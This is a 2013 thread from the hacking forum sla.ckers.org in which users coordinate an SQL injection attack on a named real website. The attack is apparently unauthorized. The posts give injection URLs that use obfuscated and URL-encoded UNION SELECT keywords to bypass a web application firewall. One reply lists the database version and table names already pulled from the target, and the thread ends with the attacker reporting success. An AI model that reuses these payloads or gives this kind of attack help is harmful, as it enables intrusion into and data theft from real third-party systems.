Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
WAF Bypass help plase
Posted by: xxy
Date: August 18, 2013 06:35PM

http://www.proav.fi/index.php?id=-13+/*!UnIoN*/+/*!SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11

Where column??

Options: ReplyQuote
Re: WAF Bypass help plase
Posted by: ajkaro
Date: August 19, 2013 06:15AM

You can use error based... It seems union select based doesn't work.

version: 5.0.77
tables (15):
- ajankohtaista
- intraoikeudet
- intraryhmat
...
...

Use URL encoding for WAF bypass

Options: ReplyQuote
Re: WAF Bypass help plase
Posted by: xxy
Date: August 19, 2013 08:45AM

Thanx but i cant understand it , Can you write the code ?

Options: ReplyQuote
Re: WAF Bypass help plase
Posted by: xxy
Date: August 19, 2013 12:55PM

Use URL encoding for WAF bypass???

http://www.proav.fi/index.php?id=13 %75nIoN %73eLeCt 1,2,3,4,5,6,7,8,9,10,11--

where column:)

Options: ReplyQuote
Re: WAF Bypass help plase
Posted by: ajkaro
Date: August 19, 2013 01:37PM

I told you union select doesn't work. Use error based SQL injection.

Options: ReplyQuote
Re: WAF Bypass help plase
Posted by: xxy
Date: August 19, 2013 03:22PM

it is ok now , thanx a lot for your help.

Options: ReplyQuote


Sorry, only registered users may post in this forum.